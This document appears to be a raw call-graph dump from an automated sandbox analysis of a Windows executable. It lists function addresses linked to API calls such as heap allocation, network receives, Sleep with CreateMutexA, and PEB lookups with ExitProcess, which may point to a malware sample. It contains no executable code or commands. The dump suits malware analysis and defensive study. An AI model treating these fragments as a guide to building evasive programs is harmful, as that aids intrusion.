10685->10686 10687 9f7dd2 10685->10687 10688 9f7b50 4 API calls 10686->10688 10687->10656 10689 9f7dd1 10688->10689 10689->10656 10691 9f7def 10690->10691 10692 9f7e09 10690->10692 10694 9f7f4f 10691->10694 10695 9f7fbb 10691->10695 10696 9f7e39 10691->10696 10693 9f75f6 RtlAllocateHeap 10692->10693 10692->10696 10697 9f7e25 10693->10697 10706 9f7f5b 10694->10706 10709 9f7f92 10694->10709 10698 9f7fc2 10695->10698 10699 9f8001 10695->10699 10695->10709 10696->10656 10700 9f6c5a RtlAllocateHeap 10697->10700 10701 9f7f69 10698->10701 10702 9f7fc7 10698->10702 10791 9f8604 10699->10791 10704 9f7e30 10700->10704 10717 9f7f77 10701->10717 10718 9f7f8b 10701->10718 10785 9f8241 10701->10785 10705 9f7fcc 10702->10705 10702->10709 10704->10656 10711 9f7fdf 10705->10711 10712 9f7fd1 10705->10712 10706->10701 10710 9f7fa2 10706->10710 10706->10717 10709->10717 10709->10718 10776 9f8420 10709->10776 10710->10718 10762 9f8390 10710->10762 10770 9f8571 10711->10770 10712->10718 10766 9f85e5 10712->10766 10717->10718 10794 9f86ea 10717->10794 10718->10656 10720 9f7f4f 10719->10720 10721 9f7fbb 10719->10721 10727 9f7f5b 10720->10727 10731 9f7f92 10720->10731 10722 9f7fc2 10721->10722 10723 9f8001 10721->10723 10721->10731 10724 9f7f69 10722->10724 10725 9f7fc7 10722->10725 10726 9f8604 RtlAllocateHeap 10723->10726 10729 9f8241 4 API calls 10724->10729 10733 9f7f8b 10724->10733 10740 9f7f77 10724->10740 10730 9f7fcc 10725->10730 10725->10731 10726->10740 10727->10724 10732 9f7fa2 10727->10732 10727->10740 10728 9f8420 RtlAllocateHeap 10728->10740 10729->10740 10734 9f7fdf 10730->10734 10735 9f7fd1 10730->10735 10731->10728 10731->10733 10731->10740 10732->10733 10736 9f8390 4 API calls 10732->10736 10733->10656 10737 9f8571 RtlAllocateHeap 10734->10737 10735->10733 10738 9f85e5 RtlAllocateHeap 10735->10738 10736->10740 10737->10740 10738->10740 10739 9f86ea 4 API calls 10739->10733 10740->10733 10740->10739 10744 9f7d5e 10741->10744 10743 9f7d40 10743->10674 10745 9f7d80 10744->10745 10746 9f75f6 RtlAllocateHeap 10745->10746 10749 9f7db7 10745->10749 10747 9f7dac 10746->10747 10748 9f6c5a RtlAllocateHeap 10747->10748 10748->10749 10749->10743 10751 9f7b67 10750->10751 10752 9f7b62 10750->10752 10758 9f8ab6 10751->10758 10753 9f75f6 RtlAllocateHeap 10752->10753 10753->10751 10756 9f75f6 RtlAllocateHeap 10757 9f7b99 10756->10757 10757->10656 10759 9f8ad1 10758->10759 10760 9f8868 GetPEB ExitProcess GetPEB RtlAllocateHeap 10759->10760 10761 9f7b85 10760->10761 10761->10756 10761->10757 10763 9f83ab 10762->10763 10764 9f83dd 10763->10764 10798 9fc88e 10763->10798 10764->10717 10767 9f85f1 10766->10767 10768 9f8420 RtlAllocateHeap 10767->10768 10769 9f8603 10768->10769 10769->10717 10775 9f8586 10770->10775 10771 9f75f6 RtlAllocateHeap 10772 9f858f 10771->10772 10773 9f6c5a RtlAllocateHeap 10772->10773 10774 9f859a 10773->10774 10774->10717 10775->10771 10775->10774 10777 9f8433 10776->10777 10778 9f844e 10777->10778 10780 9f8465 10777->10780 10779 9f75f6 RtlAllocateHeap 10778->10779 10781 9f8453 10779->10781 10784 9f845e 10780->10784 10801 9f779f 10780->10801 10783 9f6c5a RtlAllocateHeap 10781->10783 10783->10784 10784->10717 10786 9f825a 10785->10786 10787 9f779f RtlAllocateHeap 10786->10787 10788 9f8297 10787->10788 10811 9fd3c8 10788->10811 10790 9f830d 10790->10717 10790->10790 10792 9f8420 RtlAllocateHeap 10791->10792 10793 9f861b 10792->10793 10793->10717 10796 9f875d 10794->10796 10797 9f8707 10794->10797 10795 9fc88e 4 API calls 10795->10797 10796->10718 10797->10795 10797->10796 10799 9fc733 GetPEB ExitProcess GetPEB RtlAllocateHeap 10798->10799 10800 9fc8a6 10799->10800 10800->10764 10802 9f77b4 10801->10802 10803 9f77c3 10801->10803 10804 9f75f6 RtlAllocateHeap 10802->10804 10805 9f77b9 10803->10805 10806 9fb04b RtlAllocateHeap 10803->10806 10804->10805 10805->10784 10807 9f77ea 10806->10807 10808 9f7801 10807->10808 10809 9f7a33 RtlAllocateHeap 10807->10809 10810 9fadf5 RtlAllocateHeap 10808->10810 10809->10808 10810->10805 10812 9fd3ee 10811->10812 10813 9fd3d8 10811->10813 10812->10813 10818 9fd400 10812->10818 10814 9f75f6 RtlAllocateHeap 10813->10814 10815 9fd3dd 10814->10815 10816 9f6c5a RtlAllocateHeap 10815->10816 10817 9fd3e7 10816->10817 10817->10790 10819 9fd467 10818->10819 10821 9fd439 10818->10821 10820 9fd485 10819->10820 10822 9fd48a 10819->10822 10823 9fd4ae 10820->10823 10824 9fd4e4 10820->10824 10828 9fd2ff RtlAllocateHeap 10821->10828 10825 9fcbdf GetPEB ExitProcess GetPEB RtlAllocateHeap 10822->10825 10826 9fd4cc 10823->10826 10827 9fd4b3 10823->10827 10829 9fcef8 GetPEB ExitProcess GetPEB RtlAllocateHeap 10824->10829 10825->10817 10831 9fd0e2 GetPEB ExitProcess GetPEB RtlAllocateHeap 10826->10831 10830 9fd23e GetPEB ExitProcess GetPEB RtlAllocateHeap 10827->10830 10828->10817 10829->10817 10830->10817 10831->10817 10833 9d9294 10832->10833 10836 9d92a5 10833->10836 10837 9d94e0 10833->10837 10835 9d932b 10835->10469 10836->10469 10838 9d9619 10837->10838 10841 9d950b 10837->10841 10839 9d9270 RtlAllocateHeap 10838->10839 10840 9d961e 10839->10840 10842 9c2480 RtlAllocateHeap 10840->10842 10843 9d9579 10841->10843 10844 9d9552 10841->10844 10850 9d9563 10842->10850 10846 9dd3e2 RtlAllocateHeap 10843->10846 10843->10850 10844->10840 10845 9d955d 10844->10845 10848 9dd3e2 RtlAllocateHeap 10845->10848 10846->10850 10847 9f6c6a RtlAllocateHeap 10849 9d9628 10847->10849 10848->10850 10849->10835 10850->10847 10851 9d95e1 10850->10851 10851->10835 10852 9c42b0 10855 9c3ac0 10852->10855 10854 9c42bb 10856 9c3af9 10855->10856 10857 9f6c6a RtlAllocateHeap 10856->10857 10863 9c3b39 10856->10863 10858 9c3be6 10857->10858 10861 9c3c38 10858->10861 10876 9c32d0 10858->10876 10859 9c32d0 6 API calls 10864 9c3c5f 10859->10864 10861->10859 10861->10864 10862 9c3c68 10862->10854 10863->10854 10864->10862 10865 9c3810 4 API calls 10864->10865 10866 9c3cdb 10865->10866 10867 9d7d50 RtlAllocateHeap 10866->10867 10868 9c3d52 10866->10868 10867->10868 10869 9dd3e2 RtlAllocateHeap 10868->10869 10870 9c3d84 10869->10870 10871 9d7d50 RtlAllocateHeap 10870->10871 10873 9c3e03 10870->10873 10871->10873 10872 9c3e9b 10872->10854 10873->10872 10874 9f6c6a RtlAllocateHeap 10873->10874 10875 9c3ec1 10874->10875 10895 9dc6ac 10876->10895 10878 9c336b 10901 9dc26a 10878->10901 10880 9c333c 10882 9dc26a 5 API calls 10880->10882 10884 9c3350 10880->10884 10885 9c3377 10882->10885 10883 9c3314 10883->10878 10883->10880 10898 9dbd4c 10883->10898 10884->10861 10886 9dc6ac GetSystemTimePreciseAsFileTime 10885->10886 10887 9c33af 10886->10887 10888 9dc26a 5 API calls 10887->10888 10889 9c33b6 10887->10889 10888->10889 10890 9dc26a 5 API calls 10889->10890 10892 9c33d7 10889->10892 10890->10892 10891 9dc26a 5 API calls 10894 9c340e 10891->10894 10892->10891 10893 9c33eb 10892->10893 10893->10861 10894->10861 10905 9dc452 10895->10905 10897 9dc6b9 10897->10883 10922 9dbb72 10898->10922 10900 9dbd5c 10900->10883 10902 9dc274 10901->10902 10903 9dc292 10901->10903 10902->10903 10928 9dc297 10902->10928 10903->10903 10906 9dc4a8 10905->10906 10908 9dc47a 10905->10908 10906->10908 10911 9dcf6b 10906->10911 10908->10897 10909 9dc4fd 10909->10908 10910 9dcf6b GetSystemTimePreciseAsFileTime 10909->10910 10910->10909 10912 9dcf7a 10911->10912 10914 9dcf87 10911->10914 10912->10914 10915 9dcf44 10912->10915 10914->10909 10918 9dcbea 10915->10918 10919 9dcbfb GetSystemTimePreciseAsFileTime 10918->10919 10921 9dcc07 10918->10921 10919->10921 10921->10914 10923 9dbb9c 10922->10923 10924 9dbba4 10923->10924 10925 9dcf6b GetSystemTimePreciseAsFileTime 10923->10925 10924->10900 10926 9dbbcf 10925->10926 10926->10924 10927 9dcf6b GetSystemTimePreciseAsFileTime 10926->10927 10927->10924 10933 9c2ae0 10928->10933 10930 9dc2ae 10940 9dc1ff 10930->10940 10932 9dc2bf 10934 9dbedf InitOnceExecuteOnce 10933->10934 10935 9c2af4 10934->10935 10935->10930 10936 9fa671 4 API calls 10935->10936 10939 9f6ccc 10936->10939 10937 9f8bec 4 API calls 10938 9f6cf6 10937->10938 10939->10937 10941 9dc20b 10940->10941 10942 9d80c0 RtlAllocateHeap 10941->10942 10943 9dc23d 10942->10943 10948 9c26b0 10943->10948 10945 9dc252 10965 9d7970 10945->10965 10947 9dc25a 10947->10932 10949 9d7a00 RtlAllocateHeap 10948->10949 10950 9c2702 10949->10950 10951 9c2725 10950->10951 10952 9d8f40 RtlAllocateHeap 10950->10952 10953 9d8f40 RtlAllocateHeap 10951->10953 10954 9c278e 10951->10954 10952->10951 10953->10954 10955 9c27ed 10954->10955 10957 9c28b8 10954->10957 10956 9f38af RtlAllocateHeap 10955->10956 10960 9c284b 10956->10960 10958 9f6c6a RtlAllocateHeap 10957->10958 10958->10960 10959 9c287a 10959->10945 10960->10959 10961 9f6c6a RtlAllocateHeap 10960->10961 10962 9c28c2 10961->10962 10970 9f3912 10962->10970 10964 9c28e5 10964->10945 10966 9d797b 10965->10966 10967 9d7996 10965->10967 10966->10967 10968 9f6c6a RtlAllocateHeap 10966->10968 10967->10947 10969 9d79ba 10968->10969 10971 9f391f 10970->10971 10972 9f3926 10970->10972 10973 9f8ba3 RtlAllocateHeap 10971->10973 10972->10964 10973->10972 10974 9c5cad 10976 9c5caf 10974->10976 10975 9c5d17 10976->10975 10977 9f6c6a RtlAllocateHeap 10976->10977 10978 9c5d47 10977->10978 10978->10978 10979 9d80c0 RtlAllocateHeap 10978->10979 10981 9c5e3e 10979->10981 10980 9c5ea6 10981->10980 10982 9f6c6a RtlAllocateHeap 10981->10982 10983 9c5ed2 10982->10983 10984 9c5ffe 10983->10984 10985 9f6c6a RtlAllocateHeap 10983->10985 10986 9c601b 10985->10986 10987 9d80c0 RtlAllocateHeap 10986->10987 10988 9c6089 10987->10988 10989 9d80c0 RtlAllocateHeap 10988->10989 10990 9c60bd 10989->10990 10991 9d80c0 RtlAllocateHeap 10990->10991 10992 9c60ee 10991->10992 10993 9d80c0 RtlAllocateHeap 10992->10993 10994 9c611f 10993->10994 10995 9d80c0 RtlAllocateHeap 10994->10995 10997 9c6150 10995->10997 10996 9c65b1 10997->10996 10998 9f6c6a RtlAllocateHeap 10997->10998 10999 9c65dc 10998->10999 11000 9d7a00 RtlAllocateHeap 10999->11000 11001 9c66a6 11000->11001 11002 9c5c10 4 API calls 11001->11002 11003 9c66ac 11002->11003 11004 9c5c10 4 API calls 11003->11004 11005 9c66b1 11004->11005 11006 9c22c0 4 API calls 11005->11006 11007 9c66c9 11006->11007 11008 9d7a00 RtlAllocateHeap 11007->11008 11009 9c6732 11008->11009 11010 9c5c10 4 API calls 11009->11010 11011 9c673d 11010->11011 11012 9c22c0 4 API calls 11011->11012 11021 9c6757 11012->11021 11013 9c6852 11014 9d80c0 RtlAllocateHeap 11013->11014 11016 9c689c 11014->11016 11015 9d7a00 RtlAllocateHeap 11015->11021 11017 9d80c0 RtlAllocateHeap 11016->11017 11020 9c68e3 11017->11020 11018 9c5c10 4 API calls 11018->11021 11019 9c22c0 4 API calls 11019->11021 11021->11013 11021->11015 11021->11018 11021->11019 11037 9c20a0 11042 9dc68b 11037->11042 11040 9dd64e RtlAllocateHeap 11041 9c20b6 11040->11041 11045 9dc3d5 11042->11045 11044 9c20ac 11044->11040 11046 9dc3eb 11045->11046 11047 9dc3e1 11045->11047 11046->11044 11048 9dc3be 11047->11048 11049 9dc39e 11047->11049 11058 9dcd0a 11048->11058 11049->11046 11054 9dccd5 11049->11054 11052 9dc3d0 11052->11044 11055 9dc3b7 11054->11055 11056 9dcce3 InitializeCriticalSectionEx 11054->11056 11055->11044 11056->11055 11059 9dcd1f RtlInitializeConditionVariable 11058->11059 11059->11052 11060 9c34a0 11061 9c34aa 11060->11061 11062 9c34ca 11060->11062 11061->11062 11063 9f6c6a RtlAllocateHeap 11061->11063 11064 9c34f2 11063->11064 11066 9c3537 11064->11066 11068 9dc17c 11064->11068 11069 9dc18a 11068->11069 11072 9dc0e9 11069->11072 11071 9dc1aa 11073 9c22e0 RtlAllocateHeap 11072->11073 11074 9dc0fb 11073->11074 11074->11071 11100 9c9adc 11104 9c9aea 11100->11104 11101 9ca917 11102 9ca953 Sleep CreateMutexA 11101->11102 11103 9f6c6a RtlAllocateHeap 11101->11103 11105 9ca98e 11102->11105 11103->11102 11104->11101 11106 9c9b4b 11104->11106 11107 9c9b59 11106->11107 11108 9c9b65 11106->11108 11110 9d80c0 RtlAllocateHeap 11107->11110 11109 9d7a00 RtlAllocateHeap 11108->11109 11111 9c9b74 11109->11111 11112 9ca903 11110->11112 11113 9c5c10 4 API calls 11111->11113 11114 9c9b7c 11113->11114 11115 9c8b30 4 API calls 11114->11115 11116 9c9b8d 11115->11116 11117 9d8220 RtlAllocateHeap 11116->11117 11118 9c9b9c 11117->11118 11119 9d7a00 RtlAllocateHeap 11118->11119 11120 9c9ca9 11119->11120 11121 9c5c10 4 API calls 11120->11121 11122 9c9cb1 11121->11122 11123 9c8b30 4 API calls 11122->11123 11124 9c9cc2 11123->11124 11125 9d8220 RtlAllocateHeap 11124->11125 11126 9c9cd1 11125->11126 11127 a044f2 11128 a044ff 11127->11128 11130 a0450c 11127->11130 11129 9f75f6 RtlAllocateHeap 11128->11129 11131 a04504 11129->11131 11132 a04518 11130->11132 11133 9f75f6 RtlAllocateHeap 11130->11133 11134 a04539 11133->11134 11135 9f6c5a RtlAllocateHeap 11134->11135 11135->11131 11136 9dd0c7 11137 9dd0d6 11136->11137 11138 9dd17f 11137->11138 11139 9dd17b RtlWakeAllConditionVariable 11137->11139 11145 9c20c0 11146 9dc68b 2 API calls 11145->11146 11147 9c20cc 11146->11147 11148 9dd64e RtlAllocateHeap 11147->11148 11149 9c20d6 11148->11149 11185 9ce0c0 recv 11186 9ce122 recv 11185->11186 11187 9ce157 recv 11186->11187 11188 9ce191 11187->11188 11189 9ce2b3 11188->11189 11190 9dc6ac GetSystemTimePreciseAsFileTime 11188->11190 11191 9ce2ee 11190->11191 11192 9dc26a 5 API calls 11191->11192 11193 9ce358 11192->11193 11194 9c2ec0 11195 9c2f06 11194->11195 11198 9c2f6f 11194->11198 11196 9dc6ac GetSystemTimePreciseAsFileTime 11195->11196 11197 9c2f12 11196->11197 11200 9c2f1d 11197->11200 11201 9c301e 11197->11201 11199 9c2fef 11198->11199 11207 9dc6ac GetSystemTimePreciseAsFileTime 11198->11207 11204 9dd3e2 RtlAllocateHeap 11200->11204 11206 9c2f30 11200->11206 11202 9dc26a 5 API calls 11201->11202 11203 9c3024 11202->11203 11205 9dc26a 5 API calls 11203->11205 11204->11206 11208 9c2fb9 11205->11208 11206->11198 11206->11203 11207->11208 11209 9dc26a 5 API calls 11208->11209 11210 9c2fc0 11208->11210 11209->11210 11211 9dc26a 5 API calls 11210->11211 11212 9c2fd8 11210->11212 11211->11212 11212->11199 11213 9dc26a 5 API calls 11212->11213 11214 9c303c 11213->11214 11215 9dc6ac GetSystemTimePreciseAsFileTime 11214->11215 11225 9c3080 11215->11225 11216 9c31c5 11217 9dc26a 5 API calls 11216->11217 11218 9c31cb 11217->11218 11219 9dc26a 5 API calls 11218->11219 11220 9c31d1 11219->11220 11221 9dc26a 5 API calls 11220->11221 11227 9c3193 11221->11227 11222 9c31a7 11223 9dc26a 5 API calls 11224 9c31dd 11223->11224 11225->11216 11225->11218 11225->11222 11226 9dc6ac GetSystemTimePreciseAsFileTime 11225->11226 11228 9c315f 11226->11228 11227->11222 11227->11223 11228->11216 11228->11220 11228->11227 11229 9dbd4c GetSystemTimePreciseAsFileTime 11228->11229 11229->11228 11234 9c6ae9 11237 9c6b01 11234->11237 11235 9d80c0 RtlAllocateHeap 11236 9c6bac 11235->11236 11238 9d9280 RtlAllocateHeap 11236->11238 11237->11235 11239 9c6bbd 11237->11239 11238->11239 11240 9d80c0 RtlAllocateHeap 11239->11240 11241 9c6ce3 11240->11241 11290 9ca418 11294 9ca420 11290->11294 11291 9ca93f 11293 9f6c6a RtlAllocateHeap 11291->11293 11292 9ca4f3 11296 9d80c0 RtlAllocateHeap 11292->11296 11295 9ca944 11293->11295 11294->11291 11294->11292 11297 9f6c6a RtlAllocateHeap 11295->11297 11298 9ca903 11296->11298 11299 9ca949 11297->11299 11300 9f6c6a RtlAllocateHeap 11299->11300 11301 9ca94e 11300->11301 11302 9f6c6a RtlAllocateHeap 11301->11302 11303 9ca953 Sleep CreateMutexA 11302->11303 11304 9ca98e 11303->11304 11316 9c1000 11317 9dd64e RtlAllocateHeap 11316->11317 11318 9c100a 11317->11318 11354 9c2e00 11355 9c2e28 11354->11355 11356 9dc68b 2 API calls 11355->11356 11357 9c2e33 11356->11357 9725 9fd82f 9726 9fd83c 9725->9726 9727 9fd867 RtlAllocateHeap 9726->9727 9728 9fd87a 9726->9728 9727->9726 9727->9728 9729 9f6629 9732 9f64c7 9729->9732 9733 9f64d5 9732->9733 9734 9f6520 9733->9734 9737 9f652b 9733->9737 9736 9f652a 9743 9fa302 GetPEB 9737->9743 9739 9f6535 9740 9f653a GetPEB 9739->9740 9742 9f654a 9739->9742 9740->9742 9741 9f6562 ExitProcess 9742->9741 9744 9fa31c 9743->9744 9744->9739 11381 9c1020 11382 9d80c0 RtlAllocateHeap 11381->11382 11383 9c1031 11382->11383 11384 9dd64e RtlAllocateHeap 11383->11384 11385 9c103b 11384->11385 9745 9ca856 9746 9ca870 9745->9746 9753 9ca892 9745->9753 9747 9ca94e 9746->9747 9746->9753 9754 9f6c6a 9747->9754 9750 9ca903 9751 9ca953 Sleep CreateMutexA 9752 9ca98e 9751->9752 9757 9d80c0 9753->9757 9772 9f6bf6 9754->9772 9756 9f6c79 9760 9d80de 9757->9760 9762 9d8104 9757->9762 9758 9d81ee 9931 9d9270 9758->9931 9760->9750 9761 9d81f3 9934 9c2480 9761->9934 9762->9758 9764 9d817d 9762->9764 9765 9d8158 9762->9765 9767 9dd3e2 RtlAllocateHeap 9764->9767 9769 9d8169 9764->9769 9765->9761 9926 9dd3e2 9765->9926 9767->9769 9770 9f6c6a RtlAllocateHeap 9769->9770 9771 9d81d0 9769->9771 9770->9758 9771->9750 9778 9fa7c8 9772->9778 9774 9f6c0f 9774->9756 9775 9f6c01 9775->9774 9776 9f6bf6 RtlAllocateHeap 9775->9776 9777 9f6c66 9776->9777 9777->9756 9779 9fa7d2 9778->9779 9781 9fa7eb 9779->9781 9789 9fd82f 9779->9789 9781->9775 9782 9fa813 9783 9fa853 9782->9783 9784 9fa81b 9782->9784 9797 9fa49f 9783->9797 9793 9fadf5 9784->9793 9788 9fadf5 RtlAllocateHeap 9788->9781 9790 9fd83c 9789->9790 9791 9fd867 RtlAllocateHeap 9790->9791 9792 9fd87a 9790->9792 9791->9790 9791->9792 9792->9782 9794 9fae00 9793->9794 9796 9fae1b 9793->9796 9794->9796 9801 9f75f6 9794->9801 9796->9781 9798 9fa50d 9797->9798 9804 9fa445 9798->9804 9800 9fa536 9800->9788 9802 9fa7c8 RtlAllocateHeap 9801->9802 9803 9f75fb 9802->9803 9803->9796 9805 9fa451 9804->9805 9808 9fa626 9805->9808 9807 9fa473 9807->9800 9809 9fa65c 9808->9809 9810 9fa635 9808->9810 9809->9807 9810->9809 9812 9ff35f 9810->9812 9813 9ff375 9812->9813 9815 9ff3df 9812->9815 9813->9815 9817 9ff3a8 9813->9817 9822 9fadf5 RtlAllocateHeap 9813->9822 9816 9fadf5 RtlAllocateHeap 9815->9816 9839 9ff42d 9815->9839 9818 9ff401 9816->9818 9819 9ff3ca 9817->9819 9828 9fadf5 RtlAllocateHeap 9817->9828 9820 9fadf5 RtlAllocateHeap 9818->9820 9821 9fadf5 RtlAllocateHeap 9819->9821 9823 9ff414 9820->9823 9824 9ff3d4 9821->9824 9826 9ff39d 9822->9826 9829 9fadf5 RtlAllocateHeap 9823->9829 9832 9fadf5 RtlAllocateHeap 9824->9832 9825 9ff49b 9833 9fadf5 RtlAllocateHeap 9825->9833 9840 9fef3c 9826->9840 9827 9ff43b 9827->9825 9835 9fadf5 RtlAllocateHeap 9827->9835 9830 9ff3bf 9828->9830 9831 9ff422 9829->9831 9868 9ff03a 9830->9868 9837 9fadf5 RtlAllocateHeap 9831->9837 9832->9815 9838 9ff4a1 9833->9838 9835->9827 9837->9839 9838->9809 9880 9ff4d0 9839->9880 9841 9fef4d 9840->9841 9867 9ff036 9840->9867 9842 9fef5e 9841->9842 9844 9fadf5 RtlAllocateHeap 9841->9844 9843 9fef70 9842->9843 9845 9fadf5 RtlAllocateHeap 9842->9845 9846 9fef82 9843->9846 9847 9fadf5 RtlAllocateHeap 9843->9847 9844->9842 9845->9843 9848 9fef94 9846->9848 9849 9fadf5 RtlAllocateHeap 9846->9849 9847->9846 9850 9fefa6 9848->9850 9852 9fadf5 RtlAllocateHeap 9848->9852 9849->9848 9851 9fefb8 9850->9851 9853 9fadf5 RtlAllocateHeap 9850->9853 9854 9fefca 9851->9854 9855 9fadf5 RtlAllocateHeap 9851->9855 9852->9850 9853->9851 9856 9fefdc 9854->9856 9857 9fadf5 RtlAllocateHeap 9854->9857 9855->9854 9858 9fefee 9856->9858 9860 9fadf5 RtlAllocateHeap 9856->9860 9857->9856 9859 9ff000 9858->9859 9861 9fadf5 RtlAllocateHeap 9858->9861 9862 9fadf5 RtlAllocateHeap 9859->9862 9863 9ff012 9859->9863 9860->9858 9861->9859 9862->9863 9864 9ff024 9863->9864 9865 9fadf5 RtlAllocateHeap 9863->9865 9866 9fadf5 RtlAllocateHeap 9864->9866 9864->9867 9865->9864 9866->9867 9867->9817 9869 9ff047 9868->9869 9879 9ff09f 9868->9879 9870 9ff057 9869->9870 9871 9fadf5 RtlAllocateHeap 9869->9871 9872 9ff069 9870->9872 9873 9fadf5 RtlAllocateHeap 9870->9873 9871->9870 9874 9fadf5 RtlAllocateHeap 9872->9874 9875 9ff07b 9872->9875 9873->9872 9874->9875 9876 9fadf5 RtlAllocateHeap 9875->9876 9877 9ff08d 9875->9877 9876->9877 9878 9fadf5 RtlAllocateHeap 9877->9878 9877->9879 9878->9879 9879->9819 9881 9ff4fc 9880->9881 9882 9ff4dd 9880->9882 9881->9827 9882->9881 9886 9ff0db 9882->9886 9885 9fadf5 RtlAllocateHeap 9885->9881 9887 9ff1b9 9886->9887 9888 9ff0ec 9886->9888 9887->9885 9922 9ff0a3 9888->9922 9891 9ff0a3 RtlAllocateHeap 9892 9ff0ff 9891->9892 9893 9ff0a3 RtlAllocateHeap 9892->9893 9894 9ff10a 9893->9894 9895 9ff0a3 RtlAllocateHeap 9894->9895 9896 9ff115 9895->9896 9897 9ff0a3 RtlAllocateHeap 9896->9897 9898 9ff123 9897->9898 9899 9fadf5 RtlAllocateHeap 9898->9899 9900 9ff12e 9899->9900 9901 9fadf5 RtlAllocateHeap 9900->9901 9902 9ff139 9901->9902 9903 9fadf5 RtlAllocateHeap 9902->9903 9904 9ff144 9903->9904 9905 9ff0a3 RtlAllocateHeap 9904->9905 9906 9ff152 9905->9906 9907 9ff0a3 RtlAllocateHeap 9906->9907 9908 9ff160 9907->9908 9909 9ff0a3 RtlAllocateHeap 9908->9909 9910 9ff171 9909->9910 9911 9ff0a3 RtlAllocateHeap 9910->9911 9912 9ff17f 9911->9912 9913 9ff0a3 RtlAllocateHeap 9912->9913 9914 9ff18d 9913->9914 9915 9fadf5 RtlAllocateHeap 9914->9915 9916 9ff198 9915->9916 9917 9fadf5 RtlAllocateHeap 9916->9917 9918 9ff1a3 9917->9918 9919 9fadf5 RtlAllocateHeap 9918->9919 9920 9ff1ae 9919->9920 9921 9fadf5 RtlAllocateHeap 9920->9921 9921->9887 9923 9ff0d6 9922->9923 9924 9ff0c6 9922->9924 9923->9891 9924->9923 9925 9fadf5 RtlAllocateHeap 9924->9925 9925->9924 9928 9c2480 9926->9928 9927 9dd401 9927->9769 9928->9927 9938 9f38af 9928->9938 9959 9dc1b9 9931->9959 9935 9c248e 9934->9935 9936 9f38af RtlAllocateHeap 9935->9936 9937 9c24c3 9936->9937 9939 9c24c3 9938->9939 9940 9f38bc 9938->9940 9939->9769 9940->9939 9941 9f38e9 9940->9941 9944 9fa1f1 9940->9944 9953 9f8ba3 9941->9953 9945 9fa20c 9944->9945 9946 9fa1fe 9944->9946 9947 9f75f6 RtlAllocateHeap 9945->9947 9946->9945 9949 9fa223 9946->9949 9948 9fa214 9947->9948 9956 9f6c5a 9948->9956 9951 9fa21e 9949->9951 9952 9f75f6 RtlAllocateHeap 9949->9952 9951->9941 9952->9948 9954 9fadf5 RtlAllocateHeap 9953->9954 9955 9f8bbb 9954->9955 9955->9939 9957 9f6bf6 RtlAllocateHeap 9956->9957 9958 9f6c66 9957->9958 9958->9951 9962 9dc123 9959->9962 9961 9dc1ca 9965 9c22e0 9962->9965 9964 9dc135 9964->9961 9966 9f38af RtlAllocateHeap 9965->9966 9967 9c2317 9966->9967 9967->9964 11409 9dbe50 11412 9dbd8b 11409->11412 11411 9dbe66 11413 9c22e0 RtlAllocateHeap 11412->11413 11414 9dbd9f 11413->11414 11414->11411 11415 9c3c47 11416 9c3c51 11415->11416 11418 9c32d0 6 API calls 11416->11418 11419 9c3c5f 11416->11419 11417 9c3c68 11418->11419 11419->11417 11420 9c3810 4 API calls 11419->11420 11421 9c3cdb 11420->11421 11422 9d7d50 RtlAllocateHeap 11421->11422 11423 9c3d52 11421->11423 11422->11423 11424 9dd3e2 RtlAllocateHeap 11423->11424 11425 9c3d84 11424->11425 11426 9d7d50 RtlAllocateHeap 11425->11426 11428 9c3e03 11425->11428 11426->11428 11427 9c3e9b 11428->11427 11429 9f6c6a RtlAllocateHeap 11428->11429 11430 9c3ec1 11429->11430 11431 9f6a44 11432 9f6a5c 11431->11432 11433 9f6a52 11431->11433 11449 9f698d 11432->11449 11444 9fb655 11433->11444 11436 9f6a59 11437 9f6a76 11452 9f68ed 11437->11452 11440 9f6a8a 11442 9fadf5 RtlAllocateHeap 11440->11442 11443 9f6aa8 11440->11443 11441 9fb655 RtlAllocateHeap 11441->11440 11442->11443 11445 9fb662 11444->11445 11446 9fb679 11445->11446 11455 9f75c0 11445->11455 11446->11436 11450 9f690a 4 API calls 11449->11450 11451 9f699f 11450->11451 11451->11437 11463 9f683b 11452->11463 11460 9f75e3 11455->11460 11457 9f75cb 11458 9f75f6 RtlAllocateHeap 11457->11458 11459 9f75de 11458->11459 11459->11436 11461 9fa7c8 RtlAllocateHeap 11460->11461 11462 9f75e8 11461->11462 11462->11457 11464 9f6849 11463->11464 11465 9f6863 11463->11465 11476 9f69cc 11464->11476 11466 9f686a 11465->11466 11467 9f6889 11465->11467 11470 9f6853 11466->11470 11480 9f69e6 11466->11480 11471 9f689f 11467->11471 11472 9f69e6 RtlAllocateHeap 11467->11472 11470->11440 11470->11441 11471->11470 11473 9f75c0 RtlAllocateHeap 11471->11473 11472->11471 11474 9f68ab 11473->11474 11475 9f75f6 RtlAllocateHeap 11474->11475 11475->11470 11477 9f69d7 11476->11477 11479 9f69df 11476->11479 11478 9fadf5 RtlAllocateHeap 11477->11478 11478->11479 11479->11470 11481 9f69cc RtlAllocateHeap 11480->11481 11482 9f69f4 11481->11482 11485 9f6a25 11482->11485 11486 9fb04b RtlAllocateHeap 11485->11486 11487 9f6a05 11486->11487 11487->11470 11531 9c3440 11536 9c2b30 11531->11536 11533 9c344f 11534 9f38af RtlAllocateHeap 11533->11534 11535 9c3483 11534->11535 11537 9f38af RtlAllocateHeap 11536->11537 11538 9c2b68 11537->11538 11538->11533 11539 9c3840 11540 9c38f6 11539->11540 11543 9c385f 11539->11543 11541 9c3920 11549 9d91e0 11541->11549 11543->11540 11543->11541 11546 9c38cd 11543->11546 11547 9c391b 11543->11547 11544 9c3925 11545 9d7d50 RtlAllocateHeap 11545->11540 11546->11545 11548 9f6c6a RtlAllocateHeap 11547->11548 11548->11541 11550 9dc1b9 RtlAllocateHeap 11549->11550 11551 9d91ea 11550->11551 11551->11544 11561 9ccc79 11562 9ccc84 11561->11562 11563 9f6c6a RtlAllocateHeap 11562->11563 11564 9cccda 11562->11564 11565 9cce36 11563->11565 11566 9d7a00 RtlAllocateHeap 11565->11566 11567 9cce92 11566->11567 11568 9c5c10 4 API calls 11567->11568 11569 9cce9d 11568->11569 11571 9cca70 11569->11571 11572 9ccadd 11571->11572 11574 9d7a00 RtlAllocateHeap 11572->11574 11577 9ccc87 11572->11577 11573 9cccda 11575 9cccee 11574->11575 11576 9c5c10 4 API calls 11575->11576 11578 9cccf9 11576->11578 11577->11573 11579 9f6c6a RtlAllocateHeap 11577->11579 11591 9c9030 11578->11591 11581 9cce36 11579->11581 11583 9d7a00 RtlAllocateHeap 11581->11583 11582 9ccd0d 11584 9d8220 RtlAllocateHeap 11582->11584 11585 9cce92 11583->11585 11586 9ccd1f 11584->11586 11587 9c5c10 4 API calls 11585->11587 11590 9d8f40 